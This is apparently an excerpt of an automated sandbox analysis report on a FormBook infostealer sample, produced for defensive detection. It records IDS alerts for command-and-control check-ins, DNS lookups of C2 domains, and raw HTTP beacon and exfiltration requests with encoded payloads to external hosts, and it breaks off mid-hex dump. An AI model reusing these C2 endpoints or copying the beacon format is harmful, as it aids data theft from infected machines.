            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 221.128.225.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 203.161.41.204:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 221.128.225.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 221.128.225.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 172.67.196.90:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.hcpf.xyz
            Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
            Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CHINA169-BACKBONECHINAUNICOMChina169BackboneCN CHINA169-BACKBONECHINAUNICOMChina169BackboneCN
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /lpx9/?2BWDG=yfrMmnVL9edufzkkV67gQCynHe5+gBIRO00DGxhyT3HPHFaar1P6nPddxxsQoEWGQjZ/tmjPotgApkkCYtaEOgx0Q//NLra/l6H2B8DThfTi+Y2WyOSOvVY=&wfm=G6oTo8vx HTTP/1.1Host: www.cortesads.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /uy9i/?2BWDG=A7IH/mkAt1Xlqot58OI0S8+25JAud1UhEF7OmTb3ULNYiQ53L6C3hDLglTjiGws4A/oSTbY/vB+Y5OcBKWIDb0nFjD7/puJZKInM70o9vL6/qU8mcXMhaE0=&wfm=G6oTo8vx HTTP/1.1Host: www.hcpf.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /czzt/?2BWDG=KAKG4dTjIDwNH0df8gU76RPra4TcXDDcoeBE7DNk+h+PFOgCIDI8J8PfDl8Ob7fEK2PQwbhHJxVFGH/KvrYWkV/dbZ6zqApOmDyx5MnRXvHLaXYjnht+BzI=&wfm=G6oTo8vx HTTP/1.1Host: www.kerennih31.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /w90v/?2BWDG=pxDyyHWOZ6ShkfCEnqNJFogO2iS2H7GTGeagqdlkqhurb1KRhlhkT/xhewcGJOmLLVVpZKefMTitXH9lS8UNo0PZm0vp/3iOIb2YKVi8sc5e3OZy6VAXooU=&wfm=G6oTo8vx HTTP/1.1Host: www.setsea.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /zqr8/?wfm=G6oTo8vx&2BWDG=eFg3/wX1FEtYOEOO4fQK8DyYn+9t5MnQ8eGMWFr4U+K0Svorcp+hU2bkMlDd81KIhBlHBG6GkgZ398FJiVEbDYmwZdVtcUsewSnSC4COghX7uWVmIVZIHjw= HTTP/1.1Host: www.cablecarrental.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /90ie/?2BWDG=AFgPY5yU7pWSzToyhb8ap/LyT/DZ/ZjK5Re3S38zcWWIWncLwX1SLyCTcQH6faMmzCRwYrf9WSeYlPfjK7mc/MKG5u8f2O6ThoCO5oN+7y0XqZ+4yAUZ7Sk=&wfm=G6oTo8vx HTTP/1.1Host: www.cqghwamc.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /axh7/?2BWDG=GVKSBocRMS2FyqXHPjOj9+OrOzTrYXMr5CJl/TLorgfRhIZbevfCFnb7jtSuw/m1FqikvKjm63UqVHDKIE9/vbA5AM47cN5qZi+S7x4iOYPaiZ0KOepXdRg=&wfm=G6oTo8vx HTTP/1.1Host: www.662-home-nb.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /9ect/?2BWDG=U/rZoA1baL0SL+0w4EIlW/PNU4WGlNOJMCqR5hBTWTt3GNoAWeGWO/yRUixBoPW1Dvb67sqohAoonSA3rpdCYc2/1Z8mRmloUf5F40vQT8nvaVFEdkWR3Yo=&wfm=G6oTo8vx HTTP/1.1Host: www.stopgazviganais.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /o6ua/?wfm=G6oTo8vx&2BWDG=PtkUewcqXhXGGI7VMrya73N+Qsazq4YwnB9JayH4Wx/cNc5hllniCA+e9SSCe0uJ5GQ5bYdUyDtJB9Y3dlvxJqubD8cdfqbVHrRmeQrxGVujTIKJZNnfFV0= HTTP/1.1Host: www.whiterabbitgroup.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /puvv/?2BWDG=T/LHAG9D/DKJAY4cGgIDBFFZtM7APAzZIDfepGdmMtSSWfF7Llgex9+86BRulJJgtl8XrMP4vqS7406AXnp/ur5mLgtmNl9eCp3snLA44a4sQebgdSQlBLY=&wfm=G6oTo8vx HTTP/1.1Host: www.bidiez.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /tlpb/?2BWDG=OZnoRuv0v/1Z/CA6HO2FEIDEprX/+1BF8Drjd+I5ZVz3FMGcbqM7cMP28c7FY+8MR3FV1C6ikaATRgc5pZIEy8I+zLLxgcbQl7nSgVZzV1ZQYFDgHJWD22o=&wfm=G6oTo8vx HTTP/1.1Host: www.deltastem.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /170y/?2BWDG=I3o45m+IM5HdnoUn9E/KeuZYRn+MuP/J4/ZPHUzUWglV3+hragapbTpjy/fUorb6vXgAJIJIb8kfShtL1xPmTfA4E9gYWbnzpoLcgkFnKSz5IRKj2k5YNRo=&wfm=G6oTo8vx HTTP/1.1Host: www.dxfwrc2h.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /314m/?wfm=G6oTo8vx&2BWDG=/nEoHfYmGWKhq8vFGRFNK+CuQmseJQPwD7+4RgKMnEs9pXqONJL1vWb6ndeJft1RBApaVMH9KNEUZDtJl+3Iba72QDspFCGFBwch41sSsFCGmhRE7+Dvvlc= HTTP/1.1Host: www.rsantos.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficHTTP traffic detected: GET /a57a/?2BWDG=ufBwFiprob3VF6k6UE1279W30zXHAcoAMQ5DA8EncRwSSdWTAgjp/PT6qbRvKZhyWw7OmhD3dggL59zyh6BsMWoIasJTvdtYPi0tEctyZ7U7D7SOHDVEOnk=&wfm=G6oTo8vx HTTP/1.1Host: www.jsninja.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
            Source: global trafficDNS traffic detected: DNS query: www.cortesads.net
            Source: global trafficDNS traffic detected: DNS query: www.hcpf.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kerennih31.click
            Source: global trafficDNS traffic detected: DNS query: www.setsea.info
            Source: global trafficDNS traffic detected: DNS query: www.cablecarrental.net
            Source: global trafficDNS traffic detected: DNS query: www.cqghwamc.top
            Source: global trafficDNS traffic detected: DNS query: www.662-home-nb.shop
            Source: global trafficDNS traffic detected: DNS query: www.stopgazviganais.org
            Source: global trafficDNS traffic detected: DNS query: www.whiterabbitgroup.pro
            Source: global trafficDNS traffic detected: DNS query: www.bidiez.com
            Source: global trafficDNS traffic detected: DNS query: www.deltastem.net
            Source: global trafficDNS traffic detected: DNS query: www.dxfwrc2h.sbs
            Source: global trafficDNS traffic detected: DNS query: www.rsantos.shop
            Source: global trafficDNS traffic detected: DNS query: www.jsninja.net
            Source: global trafficDNS traffic detected: DNS query: www.everyone.golf
            Source: unknownHTTP traffic detected: POST /uy9i/ HTTP/1.1Host: www.hcpf.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Length: 202Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Origin: http://www.hcpf.xyzReferer: http://www.hcpf.xyz/uy9i/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)Data Raw: 32 42 57 44 47 3d 4e 35 67 6e 38 51 73 30 37 7a 6e 73 6b 70 4d 4d 68 37 4d 4d 53 4b 61 35 35 34 74 35 56 31 39 45 44 46 7a 79 32 58 57 4a 5a 62 64 2b 69 41 6b 73 41 72 79 61 6b 30 72 44 6e 44 6a 78 47 77 49 72 56 75 31 6e 45 59 6b 46 6b 41 2f 61 39 63 42 31 55 33 4d 61 4e 79 2f 6c 72 69 7a 45 34 65 35 31 4e 71 58 56 78 57 34 4f 6c 73 36 34 74 32 38 33 55 56 4d 43 46 48 34 30 61 52 62 31 49 38 71 69 75 4e 34 51 30 30 65 73 6e 32 44 2f 38 6e 7a 48 57 33 55 72 79 51 6f 78 32 34 72 4e 35 67 78 45 37 41 33 2f 31 79 52 62 7a 45 38 52 55 57 6b 68 30 76 49 33 43 31 38 35 79 55 70 36 58 75 75 55 59 67 3d 3d Data Ascii: 2BWDG=N5gn8Qs07znskpMMh7MMSKa554t5V19EDFzy2XWJZbd+iAksAryak0rDnDjxGwIrVu1nEYkFkA/a9cB1U3MaNy/lrizE4e51NqXVxW4Ols64t283UVMCFH40aRb1I8qiuN4Q00esn2D/8nzHW3UryQox24rN5gxE7A3/1yRbzE8RUWkh0vI3C185yUp6XuuUYg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Oct 2024 10:57:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHB3N0phCtXpx3kUmVrWpZAbollU%2Fd5%2BaA9gAXg8iDaqNLVeXe16bRRvxFTw%2FQ5ar%2BWJqWBmUEfn49rsKG1lZFGpGgxswoGsr%2BRU%2FrdOFX%2FTw3bYwuFcEXM4Vm8EuGQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d503f21accf4755-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1130&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=851&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 4b 6b db 40 10 be 1b fc 1f 36 32 b9 59 5a 49 4e d2 5a 92 05 ad 93 90 42 d2 86 c6 7d 1d d7 d2 da 5a aa 57 a5 8d 2d d7 e4 c7 94 dc 4a 2f 79 d1 80 d3 06 1a 13 48 0e 81 b8 09 bd b4 f4 dc 43 0f 4d 0f 85 be 28 2b c9 b2 13 42 57 a0 d9 c7 37 df 7c 33 3b ab 4d cc de ab d6 9e 2c cf 01 8b 3a 36 58 7e 70 7b f1 4e 15 70 3c 84 8f 4a 55 08 67 6b b3 e0 f1 42 6d 69 11 48 82 08 56 68 40 0c 0a e1 dc 5d 0e 70 16 a5 be 02 61 bb dd 16 da 25 c1 0b 9a b0 76 1f 46 8c 45 62 6e e9 94 0f 63 1f c1 a4 26 a7 e7 73 5a 1c 25 72 6c 37 ac 5c c3 20 95 cb e5 c4 31 01 63 64 32 eb 60 8a 00 43 f3 f8 d9 2a 69 55 b8 aa e7 52 ec 52 be d6 f1 31 07 8c 64 55 e1 28 8e 28 64 de 2a 30 2c 14 84 98 56 9a 75 b9 24 c9 1c 64 34 94 50 1b eb 53 e2 14 e0 c1 f9 60 b3 b7 f3 e6 a4 bf f7 b7 77 d1 df 7f b7 f7 62 5d 83 c9 79 3e a7 85 b4 63 63 40 3b 3e 4e 39 8d 30 8c 05 4d f0 7c 3e 57 f7 cc 4e d7 41 41 93 b8 8a a8 36 3c 97 f2 21 79 8e 15 e1 06 76 92 65 03 39 c4 ee 28 0f 71 60 22 17 15 c1 ad 80 20 bb 08 16 b0 dd c2 94 18 a8 08 42 e4 86 7c 88 03 d2 50 eb c8 78 da 0c bc 55 d7 54 0a 73 f1 50 d7 f2 b9 06 c1 b6 19 62 da f5 91 69 12 b7 a9 88 40 9a f6 23 20 89 ec 37 ed 47 ea 1a c8 e7 2c a9 3b 8a 2f 0b 53 d8 51 33 61 86 67 7b 81 52 98 9f 9f 67 7c 96 3c 86 94 62 a9 57 91 d5 aa 28 8a 62 c2 5b ba 84 96 47 e8 38 be c8 be a1 9b 28 Data Ascii: 2c5|SKk@62YZINZB}ZW-J/yHCM(+BW7|3;M,:6X~p{Np<JUgkBmiHVh@]pa%vFEbnc&sZ%rl7\ 1cd2`C*iURR1dU((d*0,Vu$d4PS`wb]y>cc@;>N90M|>WNAA6<!yve9(q`" B|PxUTsPbi@# 7G,;/SQ3ag{Rg|<bW(b[G8(
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Oct 2024 10:57:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kk0aOoI3qPpWVp5RmmHPPHv%2BRbQyye3w3VaIk6m0grob2oM%2F0glOLi8lvyZjNHnVFWx5Tay9yoJTlGxFzMVzHU5lesQMjJtO7i1fFisjGk61zIu9OnQ6j6tfJ3HF%2Bq8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d503f319fc42e24-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1379&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=871&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 62 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 4b 6b db 40 10 be 1b fc 1f 36 32 b9 59 5a 49 4e d2 5a 92 05 ad 93 90 42 d2 86 c6 7d 1d d7 d2 da 5a aa 57 a5 8d 2d d7 e4 c7 94 dc 4a 2f 79 d1 80 d3 06 1a 13 48 0e 81 b8 09 bd b4 f4 dc 43 0f 4d 0f 85 be 28 2b c9 b2 13 42 57 a0 d9 c7 37 df 7c 33 3b ab 4d cc de ab d6 9e 2c cf 01 8b 3a 36 58 7e 70 7b f1 4e 15 70 3c 84 8f 4a 55 08 67 6b b3 e0 f1 42 6d 69 11 48 82 08 56 68 40 0c 0a e1 dc 5d 0e 70 16 a5 be 02 61 bb dd 16 da 25 c1 0b 9a b0 76 1f 46 8c 45 62 6e e9 94 0f 63 1f c1 a4 26 a7 e7 73 5a 1c 25 72 6c 37 ac 5c c3 20 95 cb e5 c4 31 01 63 64 32 eb 60 8a 00 43 f3 f8 d9 2a 69 55 b8 aa e7 52 ec 52 be d6 f1 31 07 8c 64 55 e1 28 8e 28 64 de 2a 30 2c 14 84 98 56 9a 75 b9 24 c9 1c 64 34 94 50 1b eb 53 e2 14 e0 c1 f9 60 b3 b7 f3 e6 a4 bf f7 b7 77 d1 df 7f b7 f7 62 5d 83 c9 79 3e a7 85 b4 63 63 40 3b 3e 4e 39 8d 30 8c 05 4d f0 7c 3e 57 f7 cc 4e d7 41 41 93 b8 8a a8 36 3c 97 f2 21 79 8e 15 e1 06 76 92 65 03 39 c4 ee 28 0f 71 60 22 17 15 c1 ad 80 20 bb 08 16 b0 dd c2 94 18 a8 08 42 e4 86 7c 88 03 d2 50 eb c8 78 da 0c bc 55 d7 54 0a 73 f1 50 d7 f2 b9 06 c1 b6 19 62 da f5 91 69 12 b7 a9 88 40 9a f6 23 20 89 ec 37 ed 47 ea 1a c8 e7 2c a9 3b 8a 2f 0b 53 d8 51 33 61 86 67 7b 81 52 98 9f 9f 67 7c 96 3c 86 94 62 a9 57 91 d5 aa 28 8a 62 c2 5b ba 84 96 47 e8 38 be c8 be a1 9b 28 66 6e 05 76 61 38 e8 b6 Data Ascii: 2b9|SKk@62YZINZB}ZW-J/yHCM(+BW7|3;M,:6X~p{Np<JUgkBmiHVh@]pa%vFEbnc&sZ%rl7\ 1cd2`C*iURR1dU((d*0,Vu$d4PS`wb]y>cc@;>N90M|>WNAA6<!yve9(q`" B|PxUTsPbi@# 7G,;/SQ3ag{Rg|<bW(b[G8(fnva8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Oct 2024 10:57:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goE3%2BRYobqylU7ctcI36hS1eL5y24WeXlhauy2UrQ2dsijJgI34Xyl6OTCdd50PVcdJ68772faGy%2Bvhd2GVV82iKGtTWcrOWmcFuMWC0jL157cSL736%2BMFwL5DW%2F4iI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d503f418f550baf-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1143&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10953&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 4b 6b db 40 10 be 1b fc 1f 36 32 b9 59 5a 49 4e d2 5a 92 05 ad 93 90 42 d2 86 c6 7d 1d d7 d2 da 5a aa 57 a5 8d 2d d7 e4 c7 94 dc 4a 2f 79 d1 80 d3 06 1a 13 48 0e 81 b8 09 bd b4 f4 dc 43 0f 4d 0f 85 be 28 2b c9 b2 13 42 57 a0 d9 c7 37 df 7c 33 3b ab 4d cc de ab d6 9e 2c cf 01 8b 3a 36 58 7e 70 7b f1 4e 15 70 3c 84 8f 4a 55 08 67 6b b3 e0 f1 42 6d 69 11 48 82 08 56 68 40 0c 0a e1 dc 5d 0e 70 16 a5 be 02 61 bb dd 16 da 25 c1 0b 9a b0 76 1f 46 8c 45 62 6e e9 94 0f 63 1f c1 a4 26 a7 e7 73 5a 1c 25 72 6c 37 ac 5c c3 20 95 cb e5 c4 31 01 63 64 32 eb 60 8a 00 43 f3 f8 d9 2a 69 55 b8 aa e7 52 ec 52 be d6 f1 31 07 8c 64 55 e1 28 8e 28 64 de 2a 30 2c 14 84 98 56 9a 75 b9 24 c9 1c 64 34 94 50 1b eb 53 e2 14 e0 c1 f9 60 b3 b7 f3 e6 a4 bf f7 b7 77 d1 df 7f b7 f7 62 5d 83 c9 79 3e a7 85 b4 63 63 40 3b 3e 4e 39 8d 30 8c 05 4d f0 7c 3e 57 f7 cc 4e d7 41 41 93 b8 8a a8 36 3c 97 f2 21 